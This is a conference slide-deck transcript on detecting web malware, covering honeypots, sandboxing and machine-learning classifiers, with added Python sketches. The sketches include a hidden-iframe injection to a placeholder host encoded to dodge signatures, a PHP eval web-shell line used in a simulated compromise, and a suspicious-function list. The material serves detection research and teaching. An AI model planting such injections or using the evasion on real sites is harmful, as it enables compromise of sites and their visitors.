AppSec USA 2014, Denver, Colorado
Catch me if you can: Machine Learning, VMs, honeypots and more
Jan 02, 2016
Anirban Banerjee
Ph.D. CSE – works at CloudFlare
• San Francisco
• Web-malware detection
• Machine learning, scalable systems
• Interface with hosting industry
• Co-founder of StopTheHacker
• Post acquisition at CloudFlare
• Interested in malware detection, RE
• Various talks at HostingCon, Parallels Summit
Introduction
• StopTheHacker
• CloudFlare
• Web Malware – Existing tools fail
• Web Malware – Attack vectors
• Identification
• Scaling honeypots
• Machine Learning
Quick Overview
• StopTheHacker
  – Founded in 2009
  – Funded by NSF
  – Identifies, cleans web-malware automatically
  – Partners with hosters
  – Uses Machine Learning, pattern matching, AVs, VMs
• CloudFlare
  – DDoS protection
  – CDN
  – WAF
  – Cloud Solution
  – Contribute to NGINX
  – Use Lua, Go
  – 5->7% of Internet traffic daily
StopTheHacker - CloudFlare
• AVs
  – Polymorphic malware
  – Checks for AV processes
  – Avast, ClamAV, AVG
  – Linux versions seem to not be updated as frequently
• Pattern Matching
  – Trivial to change code structure
  – Trivial to change commands
  – Yara, Perl, Grep, Awk
Web Malware - Existing Tools Fail
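The pattern-matching point can be illustrated with a minimal sketch. The signature below is a hypothetical grep/Yara-style rule written for this example, not one taken from the talk, and the `evil.example` URL is a placeholder. It fires on a plain hidden iframe but misses the same payload once it is written out through JavaScript character codes.

```python
import re

# Hypothetical static signature (an assumption for illustration):
# an iframe tag whose src points at an http:// URL.
SIGNATURE = re.compile(r"<iframe[^>]+src=['\"]http://[^'\"]+['\"]", re.IGNORECASE)


def signature_match(page: str) -> bool:
    """Return True if the static signature fires on the page source."""
    return SIGNATURE.search(page) is not None


# Plain injection: the literal iframe tag is present in the source.
plain = '<iframe src="http://evil.example/x" width="0" height="0"></iframe>'

# Same payload, emitted at runtime from character codes, so the literal
# "<iframe" text never appears in the page source.
codes = ",".join(str(ord(c)) for c in plain)
encoded = "<script>document.write(String.fromCharCode(" + codes + "));</script>"

print(signature_match(plain))    # True
print(signature_match(encoded))  # False
```

A browser rendering the second page would still produce the iframe, which is why a trivial change in code structure is enough to defeat this kind of rule.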
• Via Website
  – SQL Injection
  – XSS
  – Ads
  – 3rd party libraries
  – Themes
  – Plugins
• Bypass
  – FTP creds
  – Apache modules
  – SEO poisoning
Web Malware – Attack Vectors
• Making it a bit harder
  – Custom WP packages, e.g. DreamPress
  – Auto upgrades
  – WAFs
  – Proper separation of web server and CMS roles
  – End clients must be educated
  – *Some* default scanning for *every* site
    • Free to end client
  – Web-Malware collaboration group (SBW)
Web Malware – Attack Vectors
Web malware
• High churn
  – Iframe targets
  – Fast flux networks
  – Encoded, encrypted, randomly generated domains
  – PHP code changes
Binaries
• Low churn
  – Primarily PE32/Win
  – Target old IE exploits
  – Spyware/Adware more than malware
  – FTP sniffers, IRC drop
Identification - Highlights
Web malware
• Detection is hard
  – What is malware? Redirection, binary drop, registry modification..
  – PHP, ASP, Shell, Perl, Python, Ruby..
  – Malware is smart: UA, Geo IP, time of day, only once per IP..
  – Blacklists very outdated
  – AVs have very poor catch rate
Identification – Challenges
Scaling honeypots
[Diagram: honeypot architecture. Labels: Bare Metal, OS, Docker, Container, Front End, Public API, BL, WAF, dev.go.com, Bad Hacker, Bad Bot. Annotations: "IP, file deposited etc.."; "Host content, tripwire, analyze binary"; "WP 3.6.1, 3.7, 2.8, 3.0, Joomla, Drupal, Django – any flavor we want"; "Cuckoo-based VM: Windows binaries and honeypot".]
Yes
• Docker – common library re-use
• Spawn thousands of instances on one rack
• Any flavor of CMS you like
• Watchdog for file system changes
• Dropped files shipped off to Cuckoo VM
• Complete trace, screenshots with specific IE version
Scaling honeypots - Is this better
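The "watchdog for file system changes" step can be sketched as a snapshot-and-diff over the honeypot's web root. This is a minimal illustration under assumptions, not the speakers' implementation: the function names, the `index.php` and `dropper.exe` file names, and the use of SHA-256 hashes are all choices made for the example. A real deployment would more likely rely on kernel file-change notifications and would hand new files to the sandbox rather than print them.

```python
import hashlib
import os
import tempfile


def snapshot(root: str) -> dict:
    """Map each file under root (as a relative path) to the SHA-256 of its contents."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                state[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return state


def diff(before: dict, after: dict) -> dict:
    """Report files added, removed, or modified between two snapshots."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before.keys() & after.keys() if before[p] != after[p]),
    }


def demo() -> dict:
    """Simulate a compromise inside a throwaway web root and return the detected changes."""
    with tempfile.TemporaryDirectory() as webroot:
        index = os.path.join(webroot, "index.php")
        with open(index, "w") as fh:
            fh.write("<?php echo 'hello'; ?>")
        baseline = snapshot(webroot)

        # Simulated attacker activity: a backdoor appended to an existing
        # page and a binary dropped next to it.
        with open(index, "a") as fh:
            fh.write("<?php eval($_POST['x']); ?>")
        with open(os.path.join(webroot, "dropper.exe"), "wb") as fh:
            fh.write(b"MZ")

        return diff(baseline, snapshot(webroot))


changes = demo()
print(changes)
# {'added': ['dropper.exe'], 'removed': [], 'modified': ['index.php']}
```

In the pipeline described on the slide, the entries under `added` would be the candidates to ship off to the Cuckoo VM.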
Constant cat-and-mouse game
• Rotate IPs, avoid customer IPs
• Juicy target for DDoS (400+ Gbit/s)
• Keep up with new variants
• Malware getting smarter, checks for VM
• Malware targets mobile devices
Scaling honeypots - Challenges
Helps identify the unseen
• Need a dataset
  – Offensive Computing, VirusTotal, blacklists..
• Analyze what is important
  – Reduce noise
  – More features is not always better
  – PCA-type experiments
  – Use rules of thumb – forests/trees
  – scikit-learn/PyBrain/Weka is your friend
Machine Learning
Toolkit strategy
• PyBrain
  – Use for clustering, neural network
  – Identify what clusters are present
• scikit-learn/Weka
  – Use for classification
  – Constant retraining needed: high recall, precision
  – Feedback loop based system is important
Machine Learning
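The retraining and feedback-loop point can be made concrete with a small sketch in plain Python. The function names, the 0.9 thresholds, and the sample labels are assumptions chosen for illustration; the talk does not state which thresholds or tooling were used. The idea is to score the classifier's verdicts against labels confirmed later (for example by an analyst or the sandbox) and trigger retraining when precision or recall drops.

```python
def precision_recall(predicted, actual):
    """Compute (precision, recall) for binary labels, where 1 means malicious."""
    pairs = list(zip(predicted, actual))
    tp = sum(1 for p, a in pairs if p and a)          # flagged and truly malicious
    fp = sum(1 for p, a in pairs if p and not a)      # flagged but benign
    fn = sum(1 for p, a in pairs if not p and a)      # missed malware
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return precision, recall


def needs_retraining(predicted, actual, min_precision=0.9, min_recall=0.9):
    """Feedback check: True when either metric falls below its (assumed) threshold."""
    precision, recall = precision_recall(predicted, actual)
    return precision < min_precision or recall < min_recall


# Made-up sample: classifier verdicts vs. labels confirmed afterwards.
predicted = [1, 1, 0, 1, 0, 0, 1, 0]
confirmed = [1, 1, 1, 1, 0, 0, 0, 0]

print(precision_recall(predicted, confirmed))  # (0.75, 0.75)
print(needs_retraining(predicted, confirmed))  # True
```

Here one miss and one false alarm out of eight samples are enough to pull both metrics to 0.75, so the check asks for a retrain.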
What is the benefit
• Fuzzed iframes caught easily
• Fuzzed/encoded PHP/JS caught easily
• Catches ad misbehavior
• Catches binary that is missed by AV but tries to do “obvious” bad things
• Let's move away from signatures
Machine Learning
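One way to see why encoded PHP/JS is easier to catch with features than with signatures is to look at simple statistics of the source. The sketch below is an assumption-laden illustration: the feature set, the `SUSPICIOUS_CALLS` list, and the made-up payload string are not from the talk. It extracts three features that tend to separate packed code from ordinary code regardless of the exact bytes used.

```python
import math
import re
from collections import Counter

# Function names often seen in packed PHP/JS (an illustrative, assumed list).
SUSPICIOUS_CALLS = ("eval", "unescape", "fromCharCode", "base64_decode", "gzinflate")
STRING_LITERAL = re.compile(r"""(["'])(.*?)\1""", re.DOTALL)


def shannon_entropy(text: str) -> float:
    """Shannon entropy of the character distribution, in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in Counter(text).values())


def extract_features(source: str) -> dict:
    """Turn a script into a small feature dict usable by any classifier."""
    literals = [m.group(2) for m in STRING_LITERAL.finditer(source)]
    longest = max(literals, key=len, default="")
    calls = sum(
        len(re.findall(r"\b" + re.escape(name) + r"\s*\(", source))
        for name in SUSPICIOUS_CALLS
    )
    return {
        "longest_literal": len(longest),
        "longest_literal_entropy": round(shannon_entropy(longest), 2),
        "suspicious_calls": calls,
    }


# Made-up base64-looking blob standing in for an encoded payload.
PAYLOAD = "7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28"

clean = "<?php echo 'Hello, world'; ?>"
packed = "<?php eval(gzinflate(base64_decode('" + PAYLOAD + "'))); ?>"

print(extract_features(clean))
print(extract_features(packed))
```

Changing the payload bytes defeats a signature but leaves these features largely unchanged, which is the kind of property a classifier can learn from.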
Is it all roses and honey?
• No – constant retraining needed
• Must be able to get a large dataset
  – As features increase, the data needed increases exponentially
• CPU needed
• Near-real-time is very hard
• Toolkits are good – but can be better
Machine Learning
Right now
• PyBrain
  – Use for clustering, neural network
  – Identify what clusters are present
• scikit-learn/Weka
  – Use for classification
  – Constant retraining needed: high recall, precision
  – Feedback loop based system is important
Current Status and Future Plans
Future Plans
• Inline ML for WAF
• More focus on mobile malware
• More focus on DDoS malware
• More focus on using ML – traffic anomalies
Current Status and Future Plans
The road ahead
• Make VM detection harder
• Use an on-metal type of solution – performance!
• Investigate Go for inline traffic processing
• Potentially open source portions of code
• Automated malware collection at massive scale
More work needed